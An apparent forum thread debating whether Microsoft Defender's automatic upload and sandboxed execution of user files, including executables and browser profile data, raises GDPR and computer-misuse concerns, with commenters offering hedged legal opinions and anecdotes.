You could replace HIPAA with GDPR again, since almost any medical information about an identifiable individual will constitute sensitive personal data that requires the stronger protections under that law.

Microsoft might claim it's a Legitimate Interest (recital 49 might be useful here, though I'm not sure it applies).

I suppose it could claim that, but I suspect it would be a tough sell with the regulators if Microsoft is uploading large amounts of data the user probably didn't even know about and some of that data turned out to include sensitive personal data.

Are many folks compiling sensitive personal data into binaries?

Presumably most people don't compile that sort of data into executables, but it seems unclear whether other types of file might also be uploaded through similar mechanisms, and MS apparently executes the files with remote connectivity allowed, so the issue still seems relevant.

I'm not sure the GDPR protections are invoked by you giving them personal data they didn't ask for, but it'd be an interesting case! (Seems like anyone could screw a company by putting their name+address in the comment field of an anonymous survey, etc?)

If the data was uploaded deliberately through a system they operated, it is hard to see how they would be anything other than the data controller within the GDPR framework, unless maybe they actively tried to avoid collecting the personal data and it was supplied anyway. But it would be hard to argue that was the case if they were uploading data in ways the user of the computer in question probably wasn't even aware of.

(As an aside, if they are sweeping data on such a broad scale without being transparent about it and the only authorisation for doing so is buried deep in some legal document, it would be interesting to consider whether they were not only potentially in breach of GDPR but also various criminal computer misuse laws.)


I couldn't find any internet information on data not deliberately collected, so it's possible that nobody has figured out how GDPR applies (or I had the wrong search terms).

1. You can turn it off, and on a fresh install it even asks you for permission to upload unknown executables.

2. In business/corporate environments especially, there are many options that a properly functioning IT team should lock down via Group Policy as one of their many tasks.


Too much FUD in this thread. Thanks for something level-headed.

Running unknown executables in a sandbox and watching what they do is pretty common in advanced malware prevention software, and I expect that there's something in the TOS for Defender that grants them the permission to do this.

It's not just executables. I once caught Microsoft Defender sending copies of sensitives files like places.sqlite out of my Firefox profile directory to Redmond. Needless to say, I disabled that feature permanently via local policy.

I'm amazed they run these with internet access. I understand though that without it a malicious program may not run the same.

It probably also allows them to do some spying on networks used by malware.


They probably limit the execution resources available or you would have yourself a free albeit unpredictable cloud execution platform for all your memory/CPU intensive processes.

